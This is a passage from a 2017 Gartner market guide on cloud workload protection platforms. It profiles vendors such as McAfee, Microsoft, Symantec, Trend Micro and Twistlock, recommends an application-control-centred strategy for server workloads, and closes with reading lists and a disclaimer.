protection of these network flows using IPsec is available. Because its agent provides network flow
visibility to individual processes, it can segment, monitor for, block or alert on unexpected process-
level flows, including container-level visibility and per container network segmentation. API
integration for network switches and AWS and Azure cloud environments is provided for
configuration of segmentation enforcement.

Kaspersky Lab
Kaspersky Lab offers a server protection solution for virtualized environments protecting Windows
and Linux workloads. In VMware environments, it offers agentless anti-malware scanning for
Windows, along with a network attack blocker that provides protection from port scanning, denial of
service attacks, buffer-overrun attacks and other network-based attacks. In addition, for VMware,
Hyper-V, Citrix XenServer and KVM environments, it offers a hybrid lightweight or full server agent
deployment for Windows and Linux, with additional protection, such as vulnerability monitoring,
patch management and exploit prevention. For physical and public cloud Windows and Linux
servers, its full server agent must be used. It offers no native integration into AWS or Azure IaaS
environments, and it has not yet added explicit support for container-based environments.

Layered Insight
Layered Insight is a pure-play startup focusing on the security requirements of container-based
workloads released into general availability in early 2017. It instruments its monitoring code into the
container image to add another security layer providing fine-grained visibility into what the container
is doing (e.g., network, input/output and application behaviors), as well as policy-based application
control around those actions. To build its enforcement models, it combines observed behavior with
machine learning to create custom security policies for each containerized application. Unlike other
container security solutions, it works entirely within the container image. No host kernel agent or
privileged container is required, enabling the protection to be more portable. Organizations can
interact with Layered Insight's services via web interface or JSON API, but no specific API
integration for cloud environments is provided.

McAfee
McAfee (previously Intel Security) has two differently branded offerings for cloud workload
protection. For hybrid clouds, its foundational server security suite offering brings together anti-
malware, firewalling and HIPS capabilities for Amazon, Azure, OpenStack and VMware in
multiplatform and agentless deployments. Its advanced offering also includes dynamic whitelisting
through application control, FIM through change control and volume encryption for attached cloud
storage. Both offerings are available with a perpetual licensing model; however, the advanced
offering is also available in the AWS Marketplace with usage-based pricing. Both offerings are
licensed and managed via McAfee ePolicy Orchestrator. It has not yet added visibility or security
controls for container-based environments.

Gartner, Inc. | G00302941 Page 19 of 25

 Microsoft
In July 2016, Microsoft released Azure Security Center (ASC) for all customers of Azure. ASC
provides security protection, detection and response capabilities for workloads running in Azure.
ASC can work without an agent or, optionally, use Windows and Linux agents for more-detailed
visibility. The first release focuses more on runtime monitoring and reporting of VMs in Azure with
the ability for third-party security partners to easily insert their security controls into Azure, as well
as integrate their visibility and events into ASC. The base offering is free with a charge only for the
data stored and provides inventory, security posture assessment (of the workload itself and CISPA
of the surrounding Azure, such as Azure Virtual Networks, Azure SQL and Azure Web Apps) and
remediation capabilities. A fee-based version adds Microsoft-based automated monitoring of the
customer's workloads for indications of compromise, using threat intelligence, behavioral analytics
and anomaly detection. Separate optional free agents are available for IaaS full drive encryption and
Microsoft anti-malware scanning. Log management and change management are available from its
separately priced Operations Management Suite.

Qingteng
Qinteng is a China-based startup with an agent-based CWPP offering for Windows and Linux
servers focused in two areas. The first capability focuses on vulnerability and configuration
assessment of the server workload to reduce the surface area for attack. This can be done
preproduction via APIs or in production using its agent. The second capability delivers EDR and
deception capabilities for the server workloads, monitoring decoy system elements, system
behaviors and network communication patterns, which are sent to its cloud-based analytics
platform (an on-premises option is available) for analysis of indications of compromise and
correlation with its own threat intelligence. Optionally, Qingteng will monitor this as a service for its
customers at an additional charge, delivering a managed detection and response service. It does
not yet deliver security blocking or prevention capabilities, such as application control, nor does it
offer native integration with VMware, AWS or Azure. Its console and offering are focused on the
CWPP market in China, and it does not yet target organizations outside China.

Sophos
Sophos offers a number of server protection offerings, with a choice of on-premises or cloud-based
management. Sophos supports Windows, Linux and Unix with anti-malware scanning, HIPS and
Sophos Live Protection. On Windows servers, Sophos also provides server lockdown via
whitelisting, application control, device control and ransomware protection. For VMware
environments and Microsoft Hyper-V, Sophos provides an off-box, anti-malware solution for
Windows desktop and server workloads. For public cloud IaaS protection, Windows and Linux
server workloads are supported with agents, as well as native integration into AWS IaaS
environments to manage autoscaling instances. In addition, Sophos offers a network-based unified
threat management (UTM) for protecting IaaS workloads that includes firewalling, IPS and WAF
capabilities.

Page 20 of 25 Gartner, Inc. | G00302941

 Symantec
Symantec's primary server protection offering is its agent-based Data Center Security (DCS). Anti-
malware scanning using the Symantec Endpoint Protection engine is included in all versions, and
can be agentless on VMware NSX and the vCloud Networking and Security/vShield platform. DCS
is available on Windows and Linux, as well as several of the legacy variants of Unix. DCS provides
network segmentation, using its built-in firewall, FIM, vulnerability-facing HIPS, application control
and behavioral control of applications. Additionally, agentless IPS can be implemented with VMware
NSX integration. In 2016, Symantec was one of the first CWPP vendors to add explicit support for
containers with DCS. However, DCS has no native integration into AWS and Azure. For cloud
environments (public and private), Symantec introduced its Windows and Linux agent-based Cloud
Workload Protection (CWP) offering in early 2017 with a cloud-based SaaS console providing
integration into the APIs of AWS and Azure, combined with optional usage-based pricing. The initial
offering focuses on the core capabilities of hardening, configuration, network firewalling, application
control and behavior monitoring. The ability to manage legacy DCS servers, HIPS, anti-malware
scanning and container support is expected in future releases.

Threat Stack
Threat Stack provides a Linux-based (and in 2016, Windows) EDR agent with a cloud-based
console for on-premises and cloud-based workloads with native integration when workloads are
running on AWS. It provides baselining and monitoring of the server workload, including file integrity
monitoring, HIDS, vulnerability management, network flow monitoring and visualization, user
behavior monitoring for privileged accounts (especially related to DevOps), and analysis of the data
for indications of threats, using its own analytics, as well as ingestion of third-party threat
intelligence. In 2016, it added support for Docker containers and is able to build and monitor per-
container behavioral profiles built by scanning Docker repositories to build a library of predefined
behavioral models for common container-based applications. In late 2016, Threat Stack added
configuration auditing for baselining configuration policy to meet AWS and CIS benchmarks for
AWS, delivering CISPA capabilities.

Trend Micro
Trend Micro is well-known for its comprehensive server workload protection capabilities and offers
an agent-based solution offering a choice of system configuration and hardening recommendations,
network segmentation, file and system integrity monitoring, vulnerability-facing HIDS/HIPS using
deep packet inspection, log analysis, and anti-malware scanning. Although it includes its own
firewalling capability, it does not directly address the needs of microsegmentation projects. It
supports a broad number of OSs, including Windows, Linux and variants of legacy Unix. In VMware
environments, these capabilities can be delivered agentless. Its policy management integrates with
the native tagging of VMware, AWS and Azure. Its latest release in early 2017 provided native
application control capabilities, as well as visibility and protection for containers, but not yet per-
container policies.

Gartner, Inc. | G00302941 Page 21 of 25

 Tripwire
Tripwire is best-known for its flagship configuration assessment, file integrity and system integrity
monitoring (including application control) capabilities. Tripwire offers agent-based and agentless
solutions for a wide variety of OSs, including Windows, Linux and variants of Unix covering on-
premises, private and public cloud workload security. It has expanded to add minimal EDR
capabilities, such as behavioral monitoring. Vulnerability assessment, asset discovery, log
management, and reporting and analytics are also available as separately priced solutions. Tripwire
has integration into AWS for policy compliance, asset tagging and to enumerate assets for
scanning.

Twistlock
Twistlock is a pure-play startup focused on the security requirements of container-based workloads,
using a life cycle approach to container protection from development into operations. Rather than
use an agent in the host OS, Twistlock uses an architecture in which a privileged container is run as
a peer to the other provisioned containers on the systems. The core of its container runtime
protection is anchored in an application control model tightly controlling what can run in the
container, the resources it can access (effectively delivering file integrity monitoring) and how it
communicates using the network delivering nanosegmentation. Behaviors are controlled using
models of standard behavior created by monitoring behaviors at runtime and applying this across
fleets of similar containers. It also provides a library of behavioral patterns for common
containerized applications, as well as an internally developed anti-malware scanning engine. No
specific API integration for cloud environments is provided.

vArmour
vArmour offers an alternative to agent-based protection solutions. vArmour's distributed system of
virtual appliances provides application-aware segmentation, visibility, deception and network-based
threat detection of on-premises and public cloud-based workloads. Its core capability combines
application visibility with stateful enforcement to create, model and measure workload
segmentation. The vArmour solution can be placed in-line with network traffic for segmentation, or
in tap mode, if only visibility and threat detection are desired. Support for container-based
environments was announced in early 2017.

Market Recommendations
The rapid adoption of private and public cloud computing models, containers and DevSecOps are
fundamentally reshaping the security requirements for protecting private and public server
workloads. The time has come for enterprises to start protecting cloud-based workloads, using a
protection strategy that is different from end-user-facing desktops and laptops. Cloud server
workload protection strategies must be based on a foundation of solid operational hygiene,
including proper administrative control, patching discipline and configuration management. With the
widespread adoption of VMs and containers, server workloads tend to be allocated to a specific
application or service. This leads to the recommendation to adopt a core workload protection

Page 22 of 25 Gartner, Inc. | G00302941

 strategy anchored in reducing the surface area for attack and preventing the execution of unknown
code using application control, combined with exploit prevention and memory protection
techniques.

For servers where sensitive information is handled or stored, other types of protection beyond the
core set of capabilities (such as EDR-type monitoring) add defense in depth (see "Market Guide for
Endpoint Detection and Response Solutions"). Furthermore, if the server OS is out of support and
can't be patched (for example, Windows Server 2003), then vulnerability-facing IPS (network or
host-based) should be a key part of the protection strategy, in addition to the core application
control strategy.

Signature-based, anti-malware scanning should be deactivated (and in many cases, removed) from
all servers that don't serve as general-purpose, file-sharing repositories in favor of a whitelisting-
centric approach using application control. If regulatory requirements specify antivirus scanning and
are not negotiable, use less-frequent, file-based scanning without the performance overhead of
memory-based scanning. Alternatively, keep the agent installed, but only activated on-demand if a
scan is needed.

Gartner Recommended Reading

Some documents may not be available as part of your current Gartner subscription.

"Magic Quadrant for Endpoint Protection Platforms"

"DevSecOps: How to Seamlessly Integrate Security Into DevOps"

"Security Considerations and Best Practices for Securing Containers"

"Best Practices for Securing Workloads in Amazon Web Services"

"The Feasibility of Host-Based Controls and the Evolution of Server Security"

"How to Make Cloud IaaS Workloads More Secure Than Your Own Data Center"

"Market Guide for Endpoint Detection and Response Solutions"

"Market Guide for Privileged Access Management"

"Network Security Architectures for Virtualized Data Centers"

Evidence
"Introduction to Device Guard: Virtualization-based security and code integrity policies"

"Amazon EBS Encryption"

"Cloud Security Controls Series: Encrypting Data at Rest"

Gartner, Inc. | G00302941 Page 23 of 25

 Note 1 PCI and Application Control
The PCI DSS requirement is for an anti-malware security control. QSA should and will accept
application control directly to meet the PCI DSS requirement.

"Cb Defense Meets PCI DSS. Certified to Replace AV." Carbon Black

Note 2 VDI
VDI is a special use case in which end-user-facing endpoint sessions are hosted on a server. These
should be secured using a more-traditional endpoint security approach, in which these sessions are
kept strongly isolated from the rest of the data center network. Signature-based anti-malware
scanning should be considered mandatory. However, because these VDI sessions are hosted on
servers using virtualization platforms, agentless, anti-malware scanning solutions are often favored
to reduce resource contention.

Page 24 of 25 Gartner, Inc. | G00302941

 GARTNER HEADQUARTERS

Corporate Headquarters
56 Top Gallant Road
Stamford, CT 06902-7700
USA
+1 203 964 0096

Regional Headquarters
AUSTRALIA
BRAZIL
JAPAN
UNITED KINGDOM

For a complete list of worldwide locations,

visit http://www.gartner.com/technology/about.jsp

2017 Gartner, Inc. and/or its affiliates. All rights reserved. Gartner is a registered trademark of Gartner, Inc. or its affiliates. This
publication may not be reproduced or distributed in any form without Gartners prior written permission. If you are authorized to access
this publication, your use of it is subject to the Usage Guidelines for Gartner Services posted on gartner.com. The information contained
in this publication has been obtained from sources believed to be reliable. Gartner disclaims all warranties as to the accuracy,
completeness or adequacy of such information and shall have no liability for errors, omissions or inadequacies in such information. This
publication consists of the opinions of Gartners research organization and should not be construed as statements of fact. The opinions
expressed herein are subject to change without notice. Although Gartner research may include a discussion of related legal issues,
Gartner does not provide legal advice or services and its research should not be construed or used as such. Gartner is a public company,
and its shareholders may include firms and funds that have financial interests in entities covered in Gartner research. Gartners Board of
Directors may include senior managers of these firms or funds. Gartner research is produced independently by its research organization
without input or influence from these firms, funds or their managers. For further information on the independence and integrity of Gartner
research, see Guiding Principles on Independence and Objectivity.

Gartner, Inc. | G00302941 Page 25 of 25